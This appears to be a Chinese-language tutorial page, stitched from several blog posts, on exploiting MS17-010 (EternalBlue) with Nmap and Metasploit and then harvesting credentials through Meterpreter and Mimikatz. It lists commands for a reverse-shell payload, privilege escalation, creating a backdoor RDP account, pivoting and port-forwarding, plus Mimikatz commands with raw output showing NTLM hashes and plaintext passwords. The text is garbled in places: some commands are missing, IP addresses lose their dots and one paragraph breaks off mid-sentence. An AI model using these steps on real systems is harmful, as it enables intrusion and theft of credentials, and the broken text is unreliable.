MS17-010远程溢出漏洞（CVE-2017-0143）

Nmap :端口扫描探测工具，用于探测端口开放情况，本次使用其端口扫描和漏洞扫描功能

mestasploit ：开源的渗透测试框架软件、综合型漏洞利用工具，本次实验使用其漏洞利用模块、meterpreter组件

漏洞原理简述

MS17-010漏洞出现在Windows SMB v1中的内核态函数 srv!SrvOs2FeaListToNt 在处理 FEA (File Extended Attributes)转换时，在大非分页池(Large Non-Paged Kernel Pool)上存在缓冲区溢出。

函数 srv!SrvOs2FeaListToNt 在将 FEA list转换成 NTFEA (Windows NT FEA) list前会调用 srv!SrvOs2FeaListSizeToNt 去计算转换后的FEA lsit的大小，因计算大小错误，而导致缓冲区溢出。

曾经NSA工具箱泄露时，我们已经对永恒之蓝这个工具的使用做过讲解！ NSA黑客工具包Windows 0day验证实验 。

然而，该工具的使用环境比较苛刻，而且 *** 作较为复杂，现在msf已经加入该系列工具，使用方法更便捷。接下来，就开始 *** 作吧！

打开Kali终端，使用Nmap对目标机开放端口进行扫描

目标机开放了 135 139 445 3389 等端口，且目标机系统为Windows7,

我们使用用扫描模块，判断该漏洞是否可利用

终端内输入

打开 metasploite 命令行客户端，使用 search 命令查找ms17-010漏洞的相关模块

如下是相关可用模块

使用 use 命令选择我们要使用的扫描模块

在运行该模块之前，需要设置相关选项，我们使用 show options 查看配置信息

需要设置目标地址，设置命令：

设置完成后，执行 run 或 exploit 命令，等待执行结果

从上一步骤可以看出，该漏洞是可被利用的，接下来，我们祭出漏洞利用模块

步骤同上，查看配置信息，并设置标记为yes的属性

show options

目标机host地址:17216122

set RHOST 17216122

之后，选择载荷 payload ，也就是 shellcode ,此处我们选择回连至控制端 shell 的 payload

同样，载荷也需要进行配置， show options 查看配置信息

配置中缺少本地主机 RHOST，设置一下

完成配置后，运行 exploit 或者 run ,开始执行漏洞利用模块

成功获取来自目标主机的Session会话

我们已经成功的获取Session会话了，本次我们继续介绍meterpreter后渗透模块的其他功能

运行 sysinfo 查看目标机器相关信息

执行 help 命令可以帮助我们了解meterpreter有哪些功能

接下来，我们获取目标机hash值

执行 hashdump

mimikatz 是一个知名的密码提取神器。它支持从Windows系统内存中提取明文密码、哈希、PIN码和Kerberos凭证等， meterpreter 中正集成了这款工具。

执行 load mimikatz 即可加载该工具，其命令与 mimikatz 一样

运行命令 msv ,导出hash

然后执行 kerberos 即可获得目标机账号密码

获取了目标机的账号密码，我们结合nmap的扫描结果，可以远程登陆目标机 但是现实中，防火墙一般会拦截外来3389端口的访问请求，这种情况下该怎么解决呢？

我们可以使用端口转发工具，将端口转发到访问者本地机器的某个端口，从而进行连接

运行命令

此处，我们将远程目标的3389端口，转发到本机 17216112的3389上

如此，我们只要执行

即可登陆远程目标机器

通过本次实验，我们熟悉了从发现漏洞、到验证漏洞、再到利用漏洞这一过程，并进一步学习了Metasploit的后渗透模块的其他使用案例。

通过结合实例去学习MSF的使用，反复训练，相信大家一定能熟能生巧，彻底掌握这一工具。

metasploit是一个非常牛逼的渗透测试工具，搞渗透的几乎没人不用的。但是只学这个没其他的基础是不行的，metasploit要玩得出彩玩得高端是很多时候根据实际需要自己修改和分析渗透利用脚本，所以好的编程思维和技术也是非常重要的。总之，遵循一

Meterpreter是Metasploit的默认Windows系统下的Shell Code

以前Meterpreter只是Metasploit入侵时短期凑活一下用的

一旦入侵成功后就尽快上传远控

但是现在新一代的Meterpreter变得异常强大

我甚至感觉许多情况下用Meterpreter进行 *** 作就足够了

特色功能1：快速提权

Getsystem命令快速提权

实在没有比这个简单的了

一条指令你就拥有了System权限

Meterpreter会自己尝试用多种方法让你获得System权限

特色功能2：Hashdump

运行这个命令：run post/windows/gather/hashdump

一条命令你就能够获得Windows的Sam 数据库里的内容

就是经过加密的用户名和密码

特色功能3：直接打开3389

Getgui命令是Meterpreter新添加的命令

这个命令能够让你轻松的在目标系统上打开3389远程管理

这条命令有两个用法：run getgui -e（仅仅是打开远程管理）

run getgui -u hacker -p s3cr3t（打开远程管理并且创造一个新的用户名为Hacker密码为s3cr3t的帐号）

特色功能4：网络嗅探

Meterpreter拥有非常强大的网络嗅探能力

它能够不在目标系统上安装任何驱动的情况下进行网络嗅探

而且它还聪明到了自己的流量要被忽略掉

特色功能5：网络中继

往往入侵局域网黑客碰到的最大困难时无法穿过NAT

现在有了Meterpreter就轻松了

Meterpreter能够让一台你已经入侵的电脑变成中继,来入侵同一个局域网里的其他电脑

特色功能6：截屏

截屏看到对方电脑上正在做什么

这个功能很容易理解吧

[kali]这方面不说了, meterpreter也略过, 做个关于mimikatz的笔记

mimikatz模块, 能获取对方机器的密码(包括[哈希]和明文)

渗透模块怎么进的也不说了, 方式太多, 我用的是ms17-010

进去meterpreter后getuid一下(其他这个也没多大用处,军哥说进入meterpreter模式下 大部分情况下是拥有 system权限,无需 get system,但可能有些 权限管理严的 不一样)

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

这获得系统管理员权限

加载mimikatz模块

meterpreter > load mimikatz

Loading extension mimikatzSuccess

加载成功

获取登录密码的hash值

meterpreter > msv

[+] Running as SYSTEM

[] Retrieving msv credentials

msv credentials

===============

AuthID Package Domain User Password

0;334101 NTLM chenglee-PC chenglee lm{ 9cffd5e7eefa14babacbf0b4adf55fde }, ntlm{ 8d0f8e1a18236379538411a9056799f5 }

0;334068 NTLM chenglee-PC chenglee lm{ 9cffd5e7eefa14babacbf0b4adf55fde }, ntlm{ 8d0f8e1a18236379538411a9056799f5 }

0;997 Negotiate NT AUTHORITY LOCAL SERVICE ns (Credentials KO)

0;996 Negotiate WORKGROUP CHENGLEE-PC ns (Credentials KO)

上面已经是得到hash值了 下面算明文密码

获取明文密码

meterpreter > kerberos

[+] Running as SYSTEM

[] Retrieving kerberos credentials

kerberos credentials

====================

AuthID Package Domain User Password

0;997 Negotiate NT AUTHORITY LOCAL SERVICE

0;996 Negotiate WORKGROUP CHENGLEE-PC

0;334101 NTLM chenglee-PC chenglee lizhenghua

0;334068 NTLM chenglee-PC chenglee lizhenghua

look拿到登录的明文密码了

不过也有一些特殊的情况, 例如这样

meterpreter > kerberos

[+] Running as SYSTEM

[] Retrieving kerberos credentials

kerberos credentials

====================

AuthID Package Domain User Password

0;10408969 NTLM CLOUDVM Administrator

0;266228 NTLM CLOUDVM Administrator

0;997 Negotiate NT AUTHORITY LOCAL SERVICE

0;996 Negotiate WORKGROUP CLOUDVM

噢, 这是什么鬼儿哈希值也获取不到,

没事, 下一步继续,

使用另一种方式获取哈希值

meterpreter > mimikatz_command -f samdump::hashes

Ordinateur : chenglee-PC

BootKey : 0648ced51b6060bed1a3654e0ee0fd93

Rid : 500

User : Administrator

LM :

NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0

Rid : 501

User : Guest

LM :

NTLM :

Rid : 1000

User : chenglee

LM :

NTLM : 8d0f8e1a18236379538411a9056799f5

ok, 获取到了,

根据上面的方式获取明文密码

meterpreter > mimikatz_command -f sekurlsa::searchPasswords

[0] { chenglee ; chenglee-PC ; lizhenghua }

[1] { chenglee ; chenglee-PC ; lizhenghua }

[2] { chenglee ; chenglee-PC ; lizhenghua }

[3] { chenglee ; chenglee-PC ; lizhenghua }

[4] { chenglee-PC ; chenglee ; lizhenghua }

[5] { chenglee-PC ; chenglee ; lizhenghua }

meterpreter >

2

meterpreter > mimikatz_command -f sekurlsa::searchPasswords

[0] { Administrator ; CLOUDVM ; 1244567 }

[1] { Administrator ; CLOUDVM ; 1244567 }

都拿到了

另外提一下更简洁的方式,就是 wdigest命令了,

这个命令呢, 没有上面的复杂,加载模块后直接调用这个wdigest

meterpreter > wdigest

[+] Running as SYSTEM

[] Retrieving wdigest credentials

wdigest credentials

===================

AuthID Package Domain User Password

0;997 Negotiate NT AUTHORITY LOCAL SERVICE

0;996 Negotiate WORKGROUP CHENGLEE-PC

0;334101 NTLM chenglee-PC chenglee lizhenghua

0;334068 NTLM chenglee-PC chenglee lizhenghua

还有一个跟wdigest一样牛的就是tspkg啦

meterpreter > tspkg

[+] Running as SYSTEM

[] Retrieving tspkg credentials

tspkg credentials

=================

AuthID Package Domain User Password

0;997 Negotiate NT AUTHORITY LOCAL SERVICE

0;996 Negotiate WORKGROUP CHENGLEE-PC

0;334101 NTLM chenglee-PC chenglee lizhenghua

0;334068 NTLM chenglee-PC chenglee lizhenghua

简直就是一击毙命有木有

以上就是关于MS17-010远程溢出漏洞（CVE-2017-0143）全部的内容，包括:MS17-010远程溢出漏洞（CVE-2017-0143）、metasploit framework上怎么使用whois命令、Meterpreter等相关内容解答，如果想了解更多相关内容，可以关注我们，你们的支持是我们更新的动力！